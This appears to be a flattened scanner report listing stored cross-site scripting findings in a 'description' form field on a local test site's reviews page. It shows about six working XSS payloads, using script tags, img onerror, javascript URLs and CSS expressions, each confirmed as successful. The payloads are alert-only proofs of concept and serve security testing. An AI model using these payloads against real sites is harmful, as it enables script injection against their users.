| Vulnerable Parameter |
Original Value |
Method |
| description |
|
POST |
| Attack Type |
Attack Value |
Error |
| Unfiltered <iframe> src |
<iframe src=sLnVuRpV></iframe> |
<td><a href="mailto:jj4D7516@yahoo.com">John</a></td><td>**</td><td>57845</td><td><iframe src=sLnVuRpV></iframe></td> |
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description |
<iframe src=sLnVuRpV></iframe> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> |
| Injected: <script>alert(String.fromCharCode(78,84,79,95,122,80,119,80,119,84,108,80))</script> |
| Persists in: http://192.168.1.2:80/vulnsite/crosstraining/reviews.php |
|
 |
Successful XSS Attack |
 |
 |
nto_zpwpwtlp |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description |
<script>alert(String.fromCharCode(78,84,79,95,122,80,119,80,119,84,108,80))</script> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> |
| Injected: <<script>alert(String.fromCharCode(78,84,79,95,109,88,117,87,117,84,115,90));//<</script> |
| Persists in: http://192.168.1.2:80/vulnsite/crosstraining/reviews.php |
|
 |
Successful XSS Attack |
 |
 |
nto_mxuwutsz |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description |
<<script>alert(String.fromCharCode(78,84,79,95,109,88,117,87,117,84,115,90));//<</script> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered javascript |
| Injected: <img src=a onerror=alert(String.fromCharCode(78,84,79,95,121,86,121,83,116,88,120,77))> |
| Persists in: http://192.168.1.2:80/vulnsite/crosstraining/reviews.php |
|
 |
Successful XSS Attack |
 |
 |
nto_yvystxxm |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description |
<img src=a onerror=alert(String.fromCharCode(78,84,79,95,121,86,121,83,116,88,120,77))> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered style javascript |
| Injected: <div style=background:url(javascript:alert(String.fromCharCode(78,84,79,95,109,75,119,88,115,89,109,90)))>abc |
| Persists in: http://192.168.1.2:80/vulnsite/crosstraining/reviews.php |
|
 |
Successful XSS Attack |
 |
 |
nto_mkwxsymz |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description |
<div style=background:url(javascript:alert(String.fromCharCode(78,84,79,95,109,75,119,88,115,89,109,90)))>abc |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered <script> |
| Injected: <script>eval(alert(String.fromCharCode(78,84,79,95,109,77,116,78,119,78,110,85)))</script> |
| Persists in: http://192.168.1.2:80/vulnsite/crosstraining/reviews.php |
|
 |
Successful XSS Attack |
 |
 |
nto_mmtnwnnu |
 |
 |
 |
 |
|
 |
 |
 |
 |
FORM POST Parameters |
 |
 |
 |
 |
|
| description |
<script>eval(alert(String.fromCharCode(78,84,79,95,109,77,116,78,119,78,110,85)))</script> |
|
|
 |
|
 |
 |
 |
 |
|
|
| Unfiltered style expression |
| Injected: <a style=width:expression(alert(String.fromCharCode(78,84,79,95,108,90,115,81,118,75,115,86)))>abc |
| Persists in: http://192.168.1.2:80/vulnsite/crosstraining/reviews.php |
|
 |
Successful XSS Attack |
 |
 |
nto_lzsqvksv |
 |
 |
 |
 |
|
| |